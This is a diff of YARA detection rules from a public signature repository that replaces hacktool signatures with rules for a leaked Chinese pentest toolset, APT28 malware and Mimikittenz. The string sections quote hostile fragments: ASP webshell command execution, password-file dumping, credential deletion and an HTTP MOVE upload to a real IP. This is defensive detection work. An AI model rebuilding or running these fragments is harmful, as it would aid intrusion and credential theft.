-		$s3 = "PowershellMafia\\Invoke-Mimikatz.ps1" ascii
-		$s4 = "Inveigh\\Inveigh.ps1" ascii
+		$s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii
+		$s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii
+		$s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii
+		$s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
+		$s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
 
 	condition:
-		1 of them
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_Psattack_ZIP : FILE
+rule SIGNATURE_BASE_CN_Honker_Chinachopper_Db : FILE
 {
 	meta:
-		description = "PSAttack - Powershell attack tool - file PSAttack.zip"
+		description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e064eb4-0b87-590c-9ee4-6764b982c006"
-		date = "2016-03-09"
-		modified = "2025-04-14"
-		reference = "https://github.com/gdssecurity/PSAttack/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3174-L3188"
+		id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L205-L221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2"
-		logic_hash = "4c869e8663b8c87780d4be622f86b3887511e1ac3cfc67767f1c986af7d43767"
-		score = 100
+		hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
+		logic_hash = "b650498df99c4620e3904ce8980cd58eb0cb5e0a7a275d54bdbcc41a687bec8e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PSAttack.exe" fullword ascii
+		$s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide
+		$s2 = "<O>act=login</O>" fullword wide
+		$s3 = "<H>localhost</H>" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x4b50 and all of them
+		filesize < 340KB and 2 of them
 }
-rule SIGNATURE_BASE_Linux_Portscan_Shark_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Syconfig : FILE
 {
 	meta:
-		description = "Detects Linux Port Scanner Shark"
+		description = "Script from disclosed CN Honker Pentest Toolset - file syconfig.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b264106-3536-56f4-9e8c-68f3756af07d"
-		date = "2016-04-01"
-		modified = "2025-04-14"
-		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3199-L3216"
+		id = "3850007d-20d5-5b10-a549-dc4655877c6e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L223-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e807ed6c83c8d908bfe29c65abd7b877b65655cc64cd1497fc124a2fd88cd1e9"
-		score = 75
+		hash = "ff75353df77d610d3bccfbffb2c9dfa258b2fac9"
+		logic_hash = "6b7f918b83bac84df5ac6b247d4162dd385aba0a32570366c62fc4830199e86e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4da0e535c36c0c52eaa66a5df6e070c52e7ddba13816efc3da5691ea2ec06c18"
-		hash2 = "e395ca5f932419a4e6c598cae46f17b56eb7541929cdfb67ef347d9ec814dea3"
 
 	strings:
-		$s0 = "rm -rf scan.log session.txt" fullword ascii
-		$s17 = "*** buffer overflow detected ***: %s terminated" fullword ascii
-		$s18 = "*** stack smashing detected ***: %s terminated" fullword ascii
+		$s9 = "Hashq.CrackHost+FormUnit" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7362 and all of them )
+		uint16( 0 ) == 0x0100 and filesize < 18KB and all of them
 }
-rule SIGNATURE_BASE_Linux_Portscan_Shark_2
+rule SIGNATURE_BASE_CN_Honker_Linux_Bin : FILE
 {
 	meta:
-		description = "Detects Linux Port Scanner Shark"
+		description = "Script from disclosed CN Honker Pentest Toolset - file linux_bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eea378d5-0399-5035-8573-139878fa1abc"
-		date = "2016-04-01"
-		modified = "2025-04-14"
-		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3218-L3235"
+		id = "3c56a4a8-6392-517c-a16e-63785799acb9"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L239-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45efbbe01c45065efc07e9c75b6a7cdcae469861f84df4a1e1381fe864f7ddc0"
-		score = 75
+		hash = "26e71e6ebc6a3bdda9467ce929610c94de8a7ca0"
+		logic_hash = "d02fcf23e46a0b6d44c382e34d73ef6239b6a1afc690e417aa0e6b0898e277c0"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5f80bd2db608a47e26290f3385eeb5bfc939d63ba643f06c4156704614def986"
-		hash2 = "90af44cbb1c8a637feda1889d301d82fff7a93b0c1a09534909458a64d8d8558"
 
 	strings:
-		$s1 = "usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>" fullword ascii
-		$s2 = "Difference between server modulus and host modulus is only %d. It's illegal and may not work" fullword ascii
-		$s3 = "rm -rf scan.log" fullword ascii
+		$s1 = "client.sin_port = htons(atoi(argv[3]));" fullword ascii
+		$s2 = "printf(\"\\n\\n*********Waiting Client connect*****\\n\\n\");" fullword ascii
 
 	condition:
-		all of them
+		filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Dnscat2_Hacktool : FILE
+rule SIGNATURE_BASE_CN_Honker_Intersect2_Beta : FILE
 {
 	meta:
-		description = "Detects dnscat2 - from files dnscat, dnscat2.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23cca0fe-3e4e-5b91-8b53-933de8ff264a"
-		date = "2016-05-15"
-		modified = "2025-04-14"
-		reference = "https://downloads.skullsecurity.org/dnscat2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3244-L3263"
+		id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L256-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c163a62b607323e08ca083a7091585550c830827728a8a60e25af8db6550ed1c"
-		score = 75
+		hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
+		logic_hash = "bc6a83f8f851f7fb5b620be889619fcbd9f34ba27d495c2040e207caf95854bb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "8bc8d6c735937c9c040cbbdcfc15f17720a7ecef202a19a7bf43e9e1c66fe66a"
-		hash2 = "4a882f013419695c8c0ac41d8a0fde1cf48172a89e342c504138bc6f1d13c7c8"
 
 	strings:
-		$s1 = "--exec -e <process>     Execute the given process and link it to the stream." fullword ascii
-		$s2 = "Sawlog" fullword ascii
-		$s3 = "COMMAND_EXEC [request] :: request_id: 0x%04x :: name: %s :: command: %s" fullword ascii
-		$s4 = "COMMAND_SHELL [request] :: request_id: 0x%04x :: name: %s" fullword ascii
-		$s5 = "[Tunnel %d] connection to %s:%d closed by the server!" fullword ascii
+		$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii
+		$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii
+		$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 2 of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x2123 and filesize < 50KB and 2 of them
 }
-rule SIGNATURE_BASE_WCE_In_Memory
+rule SIGNATURE_BASE_CN_Honker_IIS_Logcleaner1_0_Readme : FILE
 {
 	meta:
-		description = "Detects Windows Credential Editor (WCE) in memory (and also on disk)"
+		description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90c90ca5-e3be-5035-b35c-c2e7faec43a5"
-		date = "2016-08-28"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3265-L3279"
+		id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L274-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74ab7772db5b1de8a4eae03370e2be3cd35004730f84d472677688109a1d6d88"
-		score = 80
+		hash = "2ab47d876b49e9a693f602f3545381415e82a556"
+		logic_hash = "3cbd7b2e1710c78bc8ab8d2730cc6da8eb95038f8431d5d0081db984b3d706cf"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "wkKUSvflehHr::o:t:s:c:i:d:a:g:" fullword ascii
-		$s2 = "wceaux.dll" fullword ascii
+		$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
+		$s3 = "http://l-y.vicp.net" fullword ascii
 
 	condition:
-		all of them
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Pstgdump : FILE
+rule SIGNATURE_BASE_CN_Honker_Alien_Command : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - file pstgdump.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "86a105a3-b5b5-58b2-99bd-ec05f31adb6b"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3281-L3299"
+		id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L291-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c4f8697b1b65007acc4fdabd1c6263a428448232f95dbb12d8f737297893157"
-		score = 75
+		hash = "5896b74158ef153d426fba76c2324cd9c261c709"
+		logic_hash = "a55be30fdb6598669d144308af5a9b6a21ab6140c75fdfc18cecf5d9add4a530"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65d48a2f868ff5757c10ed796e03621961954c523c71eac1c5e044862893a106"
 
 	strings:
-		$x1 = "\\Release\\pstgdump.pdb" ascii
-		$x2 = "Failed to dump all protected storage items - see previous messages for details" fullword ascii
-		$x3 = "ptsgdump [-h][-q][-u Username][-p Password]" fullword ascii
-		$x4 = "Attempting to impersonate domain user '%s' in domain '%s'" fullword ascii
-		$x5 = "Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d" fullword ascii
-		$x6 = "Unable to obtain handle to PStoreCreateInstance in pstorec.dll" fullword ascii
+		$s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii
+		$s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Lsremora : FILE
+rule SIGNATURE_BASE_CN_Honker_Portrecall_Bc : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups"
+		description = "Script from disclosed CN Honker Pentest Toolset - file bc.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c15c583f-70cd-5a80-bdea-a14582097e50"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3301-L3323"
+		id = "ea74f260-87e6-5027-b558-628949cae32a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L308-L324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ac8f6b7284307456749b3386340a2b3deb0718bc68875bc90bccf74a96469a59"
-		score = 75
+		hash = "2084990406398afd856b2309c7f579d7d61c3767"
+		logic_hash = "f51644f195e42b91dae80ba1770aeb40790ea8528b6d09f5fed0f71d93bda5fc"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5"
-		hash2 = "e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e"
 
 	strings:
-		$x1 = "Target: Failed to load primary SAM functions." fullword ascii
-		$x2 = "lsremora64.dll" fullword ascii
-		$x3 = "PwDumpError:999999" fullword wide
-		$x4 = "PwDumpError" fullword wide
-		$x5 = "lsremora.dll" fullword ascii
-		$s1 = ":\\\\.\\pipe\\%s" fullword ascii
-		$s2 = "x%s_history_%d:%d" fullword wide
-		$s3 = "Using pipe %s" fullword ascii
+		$s0 = "print \"[*] Connected to remote host \\n\"; " fullword ascii
+		$s1 = "print \"Usage: $0 [Host] [Port] \\n\\n\";  " fullword ascii
+		$s5 = "print \"[*] Resolving HostName\\n\"; " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Servpw : FILE
+rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_MSSQL_ : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - file servpw.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file MSSQL_.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48b9dae1-16b3-563c-ac4e-b71f3a86b38a"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3325-L3344"
+		id = "35c4f119-6a57-580a-b5ee-c36af0ccc94a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L326-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "150466c23ea7aa20f6e60c592ab6bd2f42e3a48a65a6665b89a9f19fa61aae8f"
-		score = 75
+		hash = "7097c21f92306983add3b5b29a517204cd6cd819"
+		logic_hash = "4d721fd9711799cf3fd8ba6c300e270ed25faa2fb938ea01464e9bc9a3768e22"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46"
-		hash2 = "0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301"
 
 	strings:
-		$s1 = "Unable to open target process: %d, pid %d" fullword ascii
-		$s2 = "LSASS.EXE" fullword wide
-		$s3 = "WriteProcessMemory failed: %d" fullword ascii
-		$s4 = "lsremora64.dll" fullword ascii
-		$s5 = "CreateRemoteThread failed: %d" fullword ascii
-		$s6 = "Thread code: %d, path: %s" fullword ascii
+		$s1 = "GetLoginCookie = Request.Cookies(Cookie_Login)" fullword ascii
+		$s2 = "if ShellPath=\"\" Then ShellPath = \"c:\\\\windows\\\\system32\\\\cmd.exe\"" fullword ascii
+		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them ) or ( all of them )
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Fgexec : FILE
+rule SIGNATURE_BASE_CN_Honker_Nc_MOVE : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - file fgexec.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file MOVE.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ffe47b9-81a8-5eb4-b46f-db9d23682de4"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3346-L3362"
+		id = "115d1ec9-6c4f-587e-977c-cd24ada89ab6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L344-L360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3672255d7829520aa8ca792519f645b86fe4244a16652a960375f23baa7d32b3"
-		score = 75
+		hash = "4195370c103ca467cddc8f2724a8e477635be424"
+		logic_hash = "49f41162919bb04744041ae6f7438e61d98fb7d5984a17535d9c4ce4d398671b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8697897bee415f213ce7bc24f22c14002d660b8aaffab807490ddbf4f3f20249"
 
 	strings:
-		$x1 = "\\Release\\fgexec.pdb" ascii
-		$x2 = "fgexec Remote Process Execution Tool" fullword ascii
-		$x3 = "fgexec CallNamedPipe failed" fullword ascii
-		$x4 = "fizzgig and the mighty foofus.net team" fullword ascii
+		$s0 = "Destination: http://202.113.20.235/gj/images/2.asp" fullword ascii
+		$s1 = "HOST: 202.113.20.235" fullword ascii
+		$s2 = "MOVE /gj/images/A.txt HTTP/1.1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or ( 3 of them )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Cachedump : FILE
+rule SIGNATURE_BASE_CN_Honker_Mssqlpw_Scan : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file mssqlpw scan.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebcaeb73-d2df-5a4c-9f50-b4a01293b88b"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3364-L3384"
+		id = "7dc29d06-e1e7-527f-b9e5-d75f660fd73e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L362-L377"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e4d710ed9dab12114e87fa33abe6db6245c780b31bcd94fbd21e75aaa355ca8"
-		score = 75
+		hash = "e49def9d72bfef09a639ef3f7329083a0b8b151c"
+		logic_hash = "eb3bd38ca317f0b10358581fc3dbb8ca81b991b9a4f4f2d256d81a31028411b9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "cf58ca5bf8c4f87bb67e6a4e1fb9e8bada50157dacbd08a92a4a779e40d569c4"
-		hash2 = "e38edac8c838a043d0d9d28c71a96fe8f7b7f61c5edf69f1ce0c13e141be281f"
 
 	strings:
-		$s1 = "Failed to open key SECURITY\\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? " fullword ascii
-		$s2 = "Unable to open LSASS.EXE process" fullword ascii
-		$s3 = "Service not found. Installing CacheDump Service (%s)" fullword ascii
-		$s4 = "CacheDump service successfully installed." fullword ascii
-		$s5 = "Kill CacheDump service (shouldn't be used)" fullword ascii
-		$s6 = "cacheDump [-v | -vv | -K]" fullword ascii
+		$s0 = "response.Write(\"I Get it ! Password is <font color=red>\" & str & \"</font><BR>" ascii
+		$s1 = "response.Write \"Done!<br>Process \" & tTime & \" s\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 3 of them )
+		filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_Pwdump_B : FILE
+rule SIGNATURE_BASE_APT28_Hospitalitymalware_Document : FILE
 {
 	meta:
-		description = "Detects a tool used by APT groups - file PwDump.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "aad974f1-76bf-5aae-8376-a4fd3f27b345"
-		date = "2016-09-08"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3386-L3406"
+		description = "Yara Rule for APT28_Hospitality_Malware document identification"
+		author = "CSE CybSec Enterprise - Z-Lab"
+		id = "722e80ef-d729-5887-9853-cd06128f506d"
+		date = "2017-10-02"
+		modified = "2023-12-05"
+		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_hospitality.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d50ad359b9433439cddda9408d227f35ee8de3280ad24f42c5e6ef1e6a1526bd"
+		logic_hash = "33c69e03e00c90dc0b673cdb042f8f979552086414bda9c9f17f3785214b05af"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3c796092f42a948018c3954f837b4047899105845019fce75a6e82bc99317982"
+		tlp = "white"
 
 	strings:
-		$x1 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName" fullword ascii
-		$x2 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword ascii
-		$x3 = "where -x targets a 64-bit host" fullword ascii
-		$x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii
-		$s1 = "lsremora64.dll" fullword ascii
-		$s2 = "lsremora.dll" fullword ascii
-		$s3 = "servpw.exe" fullword ascii
+		$a = {75 52 B9 ED 1B D6 83 0F DB 24 CA 87 4F 5F 25 36 BF 66 BA}
+		$b = {EC 3B 6D 74 5B C5 95 F3 9E 24 5B FE 4A 64 C7 09 CE 07 C9 58 4E 62 3B}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $x* ) ) or ( 3 of them )
+		all of them and filesize > 75KB and filesize < 82KB
 }
-rule SIGNATURE_BASE_Msbuild_Mimikatz_Execution_Via_XML
+
+rule SIGNATURE_BASE_APT28_Hospitalitymalware_Mvtband_File
 {
 	meta:
-		description = "Detects an XML that executes Mimikatz on an endpoint via MSBuild"
-		author = "Florian Roth (Nextron Systems)"
-		id = "98aa68b9-6de4-5353-8d87-9e974529c044"
-		date = "2016-10-07"
-		modified = "2025-04-14"
-		reference = "https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3417-L3436"
+		description = "Yara Rule for mvtband.dll malware"
+		author = "CSE CybSec Enterprise - Z-Lab"
+		id = "f9e34c77-38b3-513e-bb29-148ac7058596"
+		date = "2017-10-02"
+		modified = "2023-12-05"
+		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_hospitality.yar#L20-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f926a2d5ab987b97c6ed2a89c69eac5549d8b7885bdbf75ce40e05e6ce6cfa7a"
+		logic_hash = "d5da333444e7c9f023d9c6d8d1dec617859efdb26f9f6bc41e22ef27d2e3059a"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tlp = "white"
 
 	strings:
-		$x1 = "<Project ToolsVersion=" ascii
-		$x2 = "</SharpLauncher>" fullword ascii
-		$s1 = "\"TVqQAAMAAAA" ascii
-		$s2 = "System.Convert.FromBase64String(" ascii
-		$s3 = ".Invoke(" ascii
-		$s4 = "Assembly.Load(" ascii
-		$s5 = ".CreateInstance(" ascii
+		$a = "DGMNOEP"
+		$b = {C7 45 94 0A 25 73 30 8D 45 94}
 
 	condition:
-		all of them
+		all of them and pe.sections [ 2 ] . raw_data_size == 0
 }
-rule SIGNATURE_BASE_Fscan_Portscanner : FILE
+rule SIGNATURE_BASE_Invoke_Mimikittenz : FILE
 {
 	meta:
-		description = "Fscan port scanner scan output / strings"
+		description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "400383dc-8bc0-5e77-a3f3-d6ba9f4c3c0f"
-		date = "2017-01-06"
-		modified = "2025-04-14"
-		reference = "https://twitter.com/JamesHabben/status/817112447970480128"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3447-L3461"
+		id = "6dcf3d0a-302b-520c-97c6-fd843c8a25b9"
+		date = "2016-07-19"
+		modified = "2023-12-05"
+		reference = "https://github.com/putterpanda/mimikittenz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikittenz.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35770f040da0b14fe4492a44383e332c9912bd89943838627491196ce8f0ec37"
-		score = 75
+		logic_hash = "f0410a0290d09d3574854b55ffe578f6f799368e14677b581cd65d18700a8656"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
 
 	strings:
-		$s1 = "Time taken:" fullword ascii
